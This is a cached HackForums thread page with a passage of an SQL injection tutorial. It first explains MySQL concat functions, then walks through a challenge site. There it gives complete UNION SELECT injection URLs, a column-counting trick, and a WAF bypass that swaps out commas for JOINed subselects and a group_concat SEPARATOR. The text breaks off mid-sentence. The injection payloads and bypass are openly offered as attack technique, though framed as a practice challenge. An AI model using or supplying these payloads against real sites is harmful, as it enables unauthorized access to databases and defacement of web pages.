<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4063916" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4063916" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4063916</a>. It is a snapshot of the page as it appeared on 17 Feb 2014 03:57:05 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4063916" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:ZnnFF5FhWrQJ:www.hackforums.net/showthread.php%3Ftid%3D4063916&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] SQLi - tricks with concatenating data - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] SQLi - tricks with concatenating data"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4063916"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 02-16-2014, 08:57 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] SQLi - tricks with concatenating data</span> </div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4063916" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/rating.js"></script><div id="success_rating_4063916" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4063916"><li style="width: 0%" class="current_rating" id="current_rating_4063916">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4063916&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4063916&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4063916&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4063916&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4063916&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4063916" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4063916_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4063916" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4063916&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4063916");
// -->
</script><div><strong>[Tutorial] SQLi - tricks with concatenating data</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid38367378" id="pid38367378"></a><table class="tborder" style="border-top-width: 0; " id="post_38367378" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 05:04 PM <span id="edited_by_38367378"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4063916&amp;pid=38367378#pid38367378">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 132<br>Posts: 2,142<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">193</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38367378">This is my SQLi tutorial <span style="font-size: large;"><span style="color: #FFD700;">#28</span></span>. My plan is to make <span style="font-size: large;"><span style="color: #FFD700;">30</span></span> SQLi tutorials so I am close to my final tutorial.<br><br>This time we will talk about <span style="color: #32CD32;">concatenating data in SQLi</span>. First part will be more theoretic, second part will be related to real case injection - my <a href="http://www.hackforums.net/showthread.php?tid=3719389" target="_blank"><span style="text-decoration: underline;">challenge #64</span></a>.<br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Why concatenating data?</span></span></span><br><br>At fast every SQLi challenge injector should made a proof of injection with putting his name beside version.<br><br>When
 we want to display some data from different columns we can use concat 
(well if we want to see all data better solution would be group_concat).<br><br>When we want to dump complete database we will use <span style="color: #00BFFF;">dump in one shot</span> syntax (see my <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">tutorials series</span></a>
 for more info). In that syntax we are building final output in steps. 
In each step we add new data to some local variable, which is displayed 
at the end when our iterations are over. So concatenating data is very 
important at fast every SQLi.<br><br><br><span style="color: #FFA500;"><span style="font-size: xx-large;"><span style="font-weight: bold;">How we can concatenate data in SQLi</span></span></span><br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #32CD32;">#1 Concat()</span></span></span><br>The most obvious way for concatenating is function <span style="font-weight: bold;"><span style="color: #FFD700;">Concat()</span></span>.<br><br><span style="color: #32CD32;">Syntax is:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">Concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">string1</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">string2</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">string3</span><span style="color: #7AC07C">...)&nbsp;<br></span></code></div></div></div><br>Function returns the string that results from concatenating all arguments.<br><br>I see many times people use <span style="color: #FFD700;">concat</span> with only one argument. Such use is wrong as we don't concatenate anything to string1.<br><br>So if we want to display version with your name we would use:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">version</span><span style="color: #7AC07C">(),&nbsp;</span><span style="color: #66CCFF">your_name_in_hex</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #32CD32;">#2 Concat_ws()</span></span></span><br><span style="font-weight: bold;"><span style="color: #FFD700;">Concat_ws()</span></span> stands for <span style="color: #FFD700;"><span style="font-weight: bold;">Concat</span></span>enate <span style="color: #FFD700;"><span style="font-weight: bold;">W</span></span>ith <span style="color: #FFD700;"><span style="font-weight: bold;">S</span></span>eparator and is a special form of CONCAT()<br><br><span style="color: #32CD32;">Syntax is:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">Concat_ws</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">separator</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">string1</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">string2</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">string3</span><span style="color: #7AC07C">...)&nbsp;<br></span></code></div></div></div><br>The
 first argument is the separator for the rest of the arguments. The 
separator is added between the strings to be concatenated.<br><br>Example:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">SELECT&nbsp;CONCAT_WS</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">'&nbsp;:&nbsp;'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'SQLi'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'is'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'very'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'interesting'</span><span style="color: #7AC07C">);&nbsp;<br></span></code></div></div></div><br>will produce result:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">SQLi&nbsp;</span><span style="color: #7AC07C">:&nbsp;</span><span style="color: #66CCFF">is&nbsp;</span><span style="color: #7AC07C">:&nbsp;</span><span style="color: #66CCFF">very&nbsp;</span><span style="color: #7AC07C">:&nbsp;</span><span style="color: #66CCFF">interesting&nbsp;<br></span></code></div></div></div><br>If we would used concat() instead of concat_ws() syntax would use:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">SELECT&nbsp;CONCAT</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">'SQLi'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'&nbsp;:&nbsp;'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'is'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'&nbsp;:&nbsp;'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'very'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'&nbsp;:&nbsp;'</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'interesting'</span><span style="color: #7AC07C">);&nbsp;<br></span></code></div></div></div>So instead of putting some divider like <span style="color: #FFD700;">' : '</span> at all places between strings we want to concatenate <span style="color: #FFD700;">concat_ws</span> is easier, because we define separator only once.<br><br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #32CD32;">#3 Group_concat()</span></span></span><br>GROUP_CONCAT()
 function is aggregate function that operate on sets of values. It 
concatenates strings from a group into one string. We can use it to 
display some grouped values (databases, tables, columns, data...) into a
 single string. Concatenating part is same as with concat(). <span style="color: #32CD32;">Difference when using group_concat is in the fact that values are grouped.</span> See both pictures bellow (ungrouped and grouped):<br><br>syntax:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">select<br>&nbsp;&nbsp;parent_id</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">child_id<br>from<br>&nbsp;&nbsp;some_table&nbsp;<br></span></code></div></div></div><br><br>will give us data from some table (like for example):<br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/307bb7effd03993f84989646cb084fe5.jpg" alt="[Image: 307bb7effd03993f84989646cb084fe5.jpg]" border="0"><br><br>but using <span style="color: #FFD700;">group_concat</span> can make much more readable result where records are grouped on some value (parent_id):<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">select<br>&nbsp;&nbsp;parent_id</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">child_id</span><span style="color: #7AC07C">)&nbsp;AS&nbsp;</span><span style="color: #66CCFF">child_id_list<br>from<br>&nbsp;&nbsp;some_table<br>group&nbsp;by<br>&nbsp;&nbsp;parent_id&nbsp;<br></span></code></div></div></div><br><br>Result (with same example data as in picture #1) will be:<br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/5cf094f5b6fcf64c4f01b152ad387f2b.jpg" alt="[Image: 5cf094f5b6fcf64c4f01b152ad387f2b.jpg]" border="0"><br><br>All <span style="color: #32CD32;">child_id</span> values are concatenated for each group (<span style="color: #32CD32;">parent_id</span>)<br><br><hr><br><span style="font-weight: bold;"><span style="color: #FFA500;">Enough theory. I am sure most of you already knew that. </span></span>Let's see some <span style="font-weight: bold;"><span style="color: #32CD32;">real case injection</span></span> like my <a href="http://www.hackforums.net/showthread.php?tid=3719389" target="_blank"><span style="text-decoration: underline;">challenge #64</span></a> <span style="font-weight: bold;"><span style="color: #32CD32;">where some <span style="font-size: large;">tricks</span> are needed</span></span>...<br><br>Task from that challenge (among others) was:<br><span style="font-style: italic;"><span style="color: #00BFFF;">change your nick name color using same vulnerable column as for version</span></span><br><br>OK. We should inject in same column and show there version with our name in different color. Typical task for <span style="font-weight: bold;"><span style="color: #00BFFF;">concat() </span></span>function (see above).<br><br>Let's inject there. After adding ' after id parameter we get an error:<br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/9852c864a1bfd9119997f7a2fbe27dd5.jpg" alt="[Image: 9852c864a1bfd9119997f7a2fbe27dd5.jpg]" border="0"><br><br>Great. <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> Site told us table name (<span style="color: #32CD32;">lecturer</span>) so we can use alternative way to find number of columns:<br><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=2'&nbsp;and&nbsp;(select&nbsp;*&nbsp;from&nbsp;lecturer)=1--&nbsp;-&nbsp;<br></span></code></div></div></div><br>Result will be:<br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/87d9130e731794f2f0012b87fe95fe11.jpg" alt="[Image: 87d9130e731794f2f0012b87fe95fe11.jpg]" border="0"><br><br>Now we know there are 7 columns. Our union select based injection will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=2'&nbsp;DiV&nbsp;0&nbsp;UnIoN&nbsp;SeLeCt&nbsp;1,2,3,4,5,6,7--+-&nbsp;<br></span></code></div></div></div><br>What we get? Error <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/a05ee503e256a3f6c9b83004f92ad50d.jpg" alt="[Image: a05ee503e256a3f6c9b83004f92ad50d.jpg]" border="0"><br><br>All commas from our command were replaces by <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FF0000;">~</span></span></span> <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"><br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Nice WAF.</span></span> But we already know how to bypass it (see my <a href="http://www.hackforums.net/showthread.php?tid=3116000" target="_blank"><span style="text-decoration: underline;">tutorial</span></a>).<br><br>Our code will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=-2'&nbsp;union&nbsp;select&nbsp;*&nbsp;from&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;1</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">a&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;2</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">b&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;3</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">c&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;4</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">d&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;5</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">e&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;6</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">f<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;7</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">g<br></span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>and we can see vulnerable columns. Let's display version with our name with <span style="color: #FFD700;">concat()</span> as we are used:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">version</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #FF99FF">'&nbsp;::&nbsp;ajkaro'</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>But wait! <span style="color: #FF0000;"><span style="font-weight: bold;">Commas are not allowed and we have comma in <span style="color: #00BFFF;">concat </span>function.</span></span> So we can't use it. <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/nono.gif" style="vertical-align: middle;" alt="Nono" title="Nono" border="0"> <span style="color: #32CD32;">It was a tricky challenge</span> <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"> Damn you ajkaro...<br><br><span style="color: #00BFFF;"><span style="font-size: x-large;">OK. So how can we bypass that problem?</span></span><br><br><span style="color: #FFA500;"><span style="font-size: xx-large;"><span style="font-weight: bold;">Trick #1</span></span></span><br>We can use <span style="color: #32CD32;">group_concat</span> function. The default separator between values in a group is comma (<span style="font-weight: bold;"><span style="color: #32CD32;">,</span></span>). <span style="color: #FF0000;">We can't use that as commas are replaced by ~ on that site. </span><br><br>If you read SQL books then you know if we want to specify a separator explicitly, we can use <span style="color: #FFD700;">SEPARATOR</span> followed by the string literal value that should be inserted between group values.<br><br>Syntax:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name&nbsp;separator&nbsp;</span><span style="color: #FF99FF">'&lt;br&gt;'</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>will give use all table names. Because we define <span style="color: #FFD700;">our separator</span>,
 comma as default separator will not be inserted between group values. 
As separator we used html tag for break, so every table name will be in 
new line.<br><br>Let's try to define as separator something like <span style="color: #FFD700;">'&lt;font color=red&gt; :: ajkaro&lt;br&gt;'</span>:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">version</span><span style="color: #7AC07C">()&nbsp;</span><span style="color: #66CCFF">separator&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;&nbsp;::&nbsp;ajkaro&lt;br&gt;'</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>Complete syntax:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=-2'&nbsp;union&nbsp;select&nbsp;*&nbsp;from&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;1</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">a&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">version</span><span style="color: #7AC07C">()&nbsp;</span><span style="color: #66CCFF">separator&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;&nbsp;::&nbsp;ajkaro&lt;br&gt;'</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">b&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;3</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">c&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;4</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">d&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;5</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">e&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;6</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">f<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;7</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">g<br></span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br><span style="color: #32CD32;">Guess what will be result?</span> Result will be <span style="color: 